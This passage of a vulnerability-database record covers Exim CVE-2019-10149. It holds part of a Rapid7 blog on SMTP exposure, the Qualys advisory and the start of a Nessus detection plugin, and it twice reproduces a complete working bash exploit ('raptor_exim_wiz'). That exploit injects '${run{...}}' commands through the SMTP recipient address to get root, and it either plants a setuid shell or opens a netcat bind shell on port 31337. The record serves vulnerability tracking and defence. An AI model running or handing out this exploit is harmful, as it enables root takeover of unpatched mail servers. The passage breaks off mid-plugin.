next-to-latest (4.92.x) is in the 100,000 range, and given the intense scrutiny afforded to Exim by national intelligence agencies, this delta can be pretty troubling. 
It\u2019s so troubling that the [American National Security Agency issued an advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) urging Exim administrators to patch and upgrade as soon as possible to avoid exploitation by the \u201cSandworm team.\u201d Specifically, the vulnerability exploited was CVE-2019-10149, and affects versions 4.87 through 4.91\u2014as of the time of our scans, we found approximately 87,500 such servers exposed to the internet. While this is about a fifth of all Exim servers out there, exposed vulnerabilities in mail servers tend to shoot to the top of any list of \u201cmust patch now\u201d vulns.\n\n### Attacker\u2019s view\n\nGiven the high value attackers tend to assign to SMTP vulnerabilities, it\u2019s no surprise that we see fairly consistent scanning action among threat actors in our SMTP honeypots.\n\n Date | SMTP Port | Count | Percentage | Provider \n---|---|---|---|--- \n2020-02-15 | 25 | 518 | 12.92% | Sprint (Poland) \n2020-02-15 | 25 | 514 | 12.82% | China Telecom \n2020-02-15 | 25 | 409 | 10.20% | Tele Asia Hosting \n2020-02-15 | 465 | 4,337 | 99.18% | DigitalOcean \n2020-02-15 | 587 | 4,568 | 99.65% | DigitalOcean \n2020-02-26 | 25 | 32,495 | 73.97% | Hostwinds \n2020-02-26 | 25 | 6,504 | 14.81% | Sprint (Poland) \n2020-02-26 | 25 | 2,730 | 6.21% | Tamatiya Eood Hosting \n2020-02-26 | 465 | 851 | 69.36% | DigitalOcean \n2020-02-26 | 465 | 344 | 28.04% | Web Hosted Group \n2020-02-26 | 587 | 948 | 94.33% | DigitalOcean \n2020-03-25 | 25 | 4,930 | 41.55% | Microsoft 365 \n2020-03-25 | 25 | 1,481 | 12.48% | Locaweb Hosting \n2020-03-25 | 25 | 509 | 4.29% | Hurricane Electric \n2020-03-25 | 465 | 415 | 95.62% | DigitalOcean \n2020-03-25 | 587 | 408 | 97.14% | DigitalOcean \n2020-05-09 | 25 | 1,180 | 58.13% | Vietnam Telecom \n2020-05-09 | 25 | 195 | 9.61% | Zumy Communications \n2020-05-09 | 25 | 159 | 7.83% | 
China Telecom \n2020-05-09 | 465 | 6,641 | 94.91% | Microsoft 365 \n2020-05-09 | 465 | 326 | 4.66% | DigitalOcean \n2020-05-09 | 587 | 316 | 95.18% | DigitalOcean \n \n### Our advice around SMTP\n\n**IT and IT security teams **should seriously consider converting over to an established email provider such as Microsoft's Office 365 or Google's G Suite. Running your own email remains one of the more truly painful network administration tasks, since outages, patch management, and redundant backups can be tricky even in the best of times, to say nothing of the constant drain of resources in the fight against spam and phishing. Established providers in this space have a proven track record of handling both spam and phishing, as well as achieving remarkable uptimes.\n\n**Cloud providers** should provide rock-solid documentation on how to set up SMTP services for their customers, starting with SSL-wrapped SMTP as a default configuration. This is one case where we wouldn't be opposed to providers such as Microsoft and Google inserting a little adver-docu-tizing pushing customers over to their hosted mail solutions.\n\n**Government cybersecurity agencies **should recognize that everyone is challenged by running merely serviceable email infrastructure, and very few organizations are truly excellent at it at any reasonable scale. 
As far as content-based attacks are concerned, these experts should continue pressing for minimum technical defenses, such as DMARC, and user education in recognizing and avoiding phishing scams.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2020-10-02T13:58:23", "published": "2020-10-02T13:58:23", "id": "RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD", "href": "https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMTP", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 - 4.91 - Local Privilege Escalation", "edition": 1, "published": "2019-06-17T00:00:00", "title": "Exim 4.87 - 4.91 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498", "href": "", "sourceData": "#!/bin/bash\n\n#\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
\n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution.\n# (CVE-2019-10149)\n#\n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team.\n#\n# Credits:\n# Qualys Security Advisory team (kudos for your amazing research!)\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\n#\n# Usage (setuid method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m setuid\n# Preparing setuid shell helper...\n# Delivering setuid payload...\n# [...]\n# Waiting 5 seconds...\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\n# # id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Usage (netcat method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m netcat\n# Delivering netcat payload...\n# Waiting 5 seconds...\n# localhost [127.0.0.1] 31337 (?) open\n# id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Vulnerable platforms:\n# Exim 4.87 - 4.91\n#\n# Tested against:\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\n#\n\nMETHOD=\"setuid\" # default method\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\n\n# usage instructions\nfunction usage()\n{\n\techo \"$0 [-m METHOD]\"\n\techo\n\techo \"-m setuid : use the setuid payload (default)\"\n\techo \"-m netcat : use the netcat payload\"\n\techo\n\texit 1\n}\n\n# payload delivery\nfunction exploit()\n{\n\t# connect to localhost:25\n\texec 3<>/dev/tcp/localhost/25\n\n\t# deliver the payload\n\tread -u 3 && echo $REPLY\n\techo \"helo localhost\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"mail from:<>\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"rcpt to:<$PAYLOAD>\" 
>&3\n\tread -u 3 && echo $REPLY\n\techo \"data\" >&3\n\tread -u 3 && echo $REPLY\n\tfor i in {1..31}\n\tdo\n\t\techo \"Received: $i\" >&3\n\tdone\n\techo \".\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"quit\" >&3\n\tread -u 3 && echo $REPLY\n}\n\n# print banner\necho\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'\necho\n\n# parse command line\nwhile [ ! -z \"$1\" ]; do\n\tcase $1 in\n\t\t-m) shift; METHOD=\"$1\"; shift;;\n\t\t* ) usage\n\t\t;;\n\tesac\ndone\nif [ -z $METHOD ]; then\n\tusage\nfi\n\n# setuid method\nif [ $METHOD = \"setuid\" ]; then\n\n\t# prepare a setuid shell helper to circumvent bash checks\n\techo \"Preparing setuid shell helper...\"\n\techo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\n\tgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\n\tif [ $? -ne 0 ]; then\n\t\techo \"Problems compiling setuid shell helper, check your gcc.\"\n\t\techo \"Falling back to the /bin/sh method.\"\n\t\tcp /bin/sh /tmp/pwned\n\tfi\n\techo\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_SETUID\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tls -l /tmp/pwned\n\t/tmp/pwned\n\n# netcat method\nelif [ $METHOD = \"netcat\" ]; then\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_NETCAT\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tnc -v 127.0.0.1 31337\n\n# print help\nelse\n\tusage\nfi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 4.91 - (Local Remote) Command Execution", "edition": 1, "published": "2019-06-05T00:00:00", "title": "Exim 4.87 4.91 - (Local Remote) Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", 
"cvelist": ["CVE-2019-10149", "CVE-1999-0095", "CVE-1999-0145"], "modified": "2019-06-05T00:00:00", "id": "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913", "href": "", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). To remotely\nexploit this vulnerability in the default configuration, an attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. 
Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be 
the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). 
Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\ndistros@openwall.\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to security@exim.\n\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-06-07T10:20:24", "description": "", "published": "2019-06-05T00:00:00", "type": "exploitdb", "title": "Exim 4.87 < 4.91 - (Local / Remote) Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T00:00:00", "id": "EDB-ID:46974", "href": "https://www.exploit-db.com/exploits/46974", "sourceData": "Qualys Security Advisory\r\n\r\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nLocal exploitation\r\nRemote exploitation\r\n- Non-default configurations\r\n- Default 
configuration\r\nAcknowledgments\r\nTimeline\r\n\r\n Boromir: \"What is this new devilry?\"\r\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\r\n -- The Lord of the Rings: The Fellowship of the Ring\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nDuring a code review of the latest changes in the Exim mail server\r\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\r\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\r\nRemote *Command* Execution, not Remote Code Execution: an attacker can\r\nexecute arbitrary commands with execv(), as root; no memory corruption\r\nor ROP (Return-Oriented Programming) is involved.\r\n\r\nThis vulnerability is exploitable instantly by a local attacker (and by\r\na remote attacker in certain non-default configurations). To remotely\r\nexploit this vulnerability in the default configuration, an attacker\r\nmust keep a connection to the vulnerable server open for 7 days (by\r\ntransmitting one byte every few minutes). However, because of the\r\nextreme complexity of Exim's code, we cannot guarantee that this\r\nexploitation method is unique; faster methods may exist.\r\n\r\nExim is vulnerable by default since version 4.87 (released on April 6,\r\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\r\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\r\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\r\n(released on February 10, 2019):\r\n\r\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\r\nhttps://bugs.exim.org/show_bug.cgi?id=2310\r\n\r\nbut was not identified as a security vulnerability, and most operating\r\nsystems are therefore affected. 
For example, we exploit an up-to-date\r\nDebian distribution (9.9) in this advisory.\r\n\r\n\r\n========================================================================\r\nLocal exploitation\r\n========================================================================\r\n\r\nThe vulnerable code is located in deliver_message():\r\n\r\n6122 #ifndef DISABLE_EVENT\r\n6123 if (process_recipients != RECIP_ACCEPT)\r\n6124 {\r\n6125 uschar * save_local = deliver_localpart;\r\n6126 const uschar * save_domain = deliver_domain;\r\n6127\r\n6128 deliver_localpart = expand_string(\r\n6129 string_sprintf(\"${local_part:%s}\", new->address));\r\n6130 deliver_domain = expand_string(\r\n6131 string_sprintf(\"${domain:%s}\", new->address));\r\n6132\r\n6133 (void) event_raise(event_action,\r\n6134 US\"msg:fail:internal\", new->message);\r\n6135\r\n6136 deliver_localpart = save_local;\r\n6137 deliver_domain = save_domain;\r\n6138 }\r\n6139 #endif\r\n\r\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\r\nexpansion item, and because new->address is the recipient of the mail\r\nthat is being delivered, a local attacker can simply send a mail to\r\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\r\nlocal_domains) and execute arbitrary commands, as root\r\n(deliver_drop_privilege is false, by default):\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nRemote exploitation\r\n========================================================================\r\n\r\nOur local-exploitation method does not work remotely, because the\r\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\r\nconfiguration requires the local part of the recipient's address (the\r\npart that precedes the @ sign) to be the name of a local user:\r\n\r\n[...]\r\n\r\n------------------------------------------------------------------------\r\nNon-default 
configurations\r\n------------------------------------------------------------------------\r\n\r\nWe eventually devised an elaborate method for exploiting Exim remotely\r\nin its default configuration, but we first identified various\r\nnon-default configurations that are easy to exploit remotely:\r\n\r\n- If the \"verify = recipient\" ACL was removed manually by an\r\n administrator (maybe to prevent username enumeration via RCPT TO),\r\n then our local-exploitation method also works remotely.\r\n\r\n- If Exim was configured to recognize tags in the local part of the\r\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\r\n then a remote attacker can simply reuse our local-exploitation method\r\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\r\n name of a local user).\r\n\r\n- If Exim was configured to relay mail to a remote domain, as a\r\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\r\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\r\n (where \"khazad.dum\" is one of Exim's relay_to_domains). 
Indeed, the\r\n \"verify = recipient\" ACL can only check the domain part of a remote\r\n address (the part that follows the @ sign), not the local part.\r\n\r\n------------------------------------------------------------------------\r\nDefault configuration\r\n------------------------------------------------------------------------\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Exim's developers, Solar Designer, and the members of\r\ndistros@openwall.\r\n\r\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\r\nDEBUG vulnerabilities:\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\r\nhttps://seclists.org/bugtraq/1995/Feb/56\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\r\nhttp://www.cheswick.com/ches/papers/berferd.pdf\r\n\r\n\r\n========================================================================\r\nTimeline\r\n========================================================================\r\n\r\n2019-05-27: Advisory sent to security@exim.\r\n\r\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46974"}, {"lastseen": "2019-06-17T14:21:48", "description": "", "published": "2019-06-17T00:00:00", "type": "exploitdb", "title": "Exim 4.87 - 4.91 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "EDB-ID:46996", "href": "https://www.exploit-db.com/exploits/46996", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
\r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) 
open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n\techo \"$0 [-m METHOD]\"\r\n\techo\r\n\techo \"-m setuid : use the setuid payload (default)\"\r\n\techo \"-m netcat : use the netcat payload\"\r\n\techo\r\n\texit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n\t# connect to localhost:25\r\n\texec 3<>/dev/tcp/localhost/25\r\n\r\n\t# deliver the payload\r\n\tread -u 3 && echo $REPLY\r\n\techo \"helo localhost\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"mail from:<>\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"rcpt to:<$PAYLOAD>\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"data\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\tfor i in {1..31}\r\n\tdo\r\n\t\techo \"Received: $i\" >&3\r\n\tdone\r\n\techo \".\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"quit\" >&3\r\n\tread -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! 
-z \"$1\" ]; do\r\n\tcase $1 in\r\n\t\t-m) shift; METHOD=\"$1\"; shift;;\r\n\t\t* ) usage\r\n\t\t;;\r\n\tesac\r\ndone\r\nif [ -z $METHOD ]; then\r\n\tusage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n\t# prepare a setuid shell helper to circumvent bash checks\r\n\techo \"Preparing setuid shell helper...\"\r\n\techo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n\tgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo \"Problems compiling setuid shell helper, check your gcc.\"\r\n\t\techo \"Falling back to the /bin/sh method.\"\r\n\t\tcp /bin/sh /tmp/pwned\r\n\tfi\r\n\techo\r\n\r\n\t# select and deliver the payload\r\n\techo \"Delivering $METHOD payload...\"\r\n\tPAYLOAD=$PAYLOAD_SETUID\r\n\texploit\r\n\techo\r\n\r\n\t# wait for the magic to happen and spawn our shell\r\n\techo \"Waiting 5 seconds...\"\r\n\tsleep 5\r\n\tls -l /tmp/pwned\r\n\t/tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n\t# select and deliver the payload\r\n\techo \"Delivering $METHOD payload...\"\r\n\tPAYLOAD=$PAYLOAD_NETCAT\r\n\texploit\r\n\techo\r\n\r\n\t# wait for the magic to happen and spawn our shell\r\n\techo \"Waiting 5 seconds...\"\r\n\tsleep 5\r\n\tnc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n\tusage\r\nfi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/46996"}], "nessus": [{"lastseen": "2021-02-09T20:55:28", "description": "exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim\n (bsc#1136587)", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-12T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2019-1524)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-12T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:eximstats-html", 
"cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:exim-debugsource"], "id": "OPENSUSE-2019-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/125843", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1524.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125843);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2019-1524)\");\n script_summary(english:\"Check for the openSUSE-2019-1524 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim\n (bsc#1136587)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136587\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
